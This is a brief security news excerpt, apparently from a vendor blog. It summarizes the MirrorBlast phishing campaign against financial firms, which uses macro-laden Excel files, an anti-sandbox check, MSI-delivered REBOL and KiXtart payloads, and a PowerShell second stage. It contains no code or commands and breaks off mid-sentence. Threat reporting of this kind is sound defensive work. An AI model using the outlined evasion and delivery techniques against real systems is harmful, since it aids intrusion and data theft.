MirrorBlast, the New Phishing Campaign Targeting Financial Organizations

A fresh variant of a phishing campaign has been recently detected. By its nickname MirrorBlast, its targets are finance enterprises. The attack methods it uses consist of malicious Excel documents that are almost untraceable.

MirrorBlast: How Does It Work?

The researchers who discovered this new phishing campaign were those from Morphisec Labs and according to their report, here is how MirrorBlast works:

It uses an obfuscated malicious code; Only a 32-bit Office version can be used to execute the macro code; After the target opens the compromised file and clicks on “enable content” a JScript script is executed by the macro; Then this triggers an MSI package downloading and installing; However, before this, an anti-sandboxing check is performed by the macro: this has the role to establish if computer name and user domain are the same things and if the user name is the same as “admin”; The MSI package will have two versions: one features the programming language REBOL, the other KiXtart. REBOL version: base64 encoded, it has the role of data exfiltration, for instance: OS version, user name, or architecture. The second stage where PowerShell is initiated through the C2 command follows. KiXtart version has also the

Read More: https://heimdalsecurity.com/blog/mirrorblast-the-new-phishing-campaign-targeting-financial-organizations/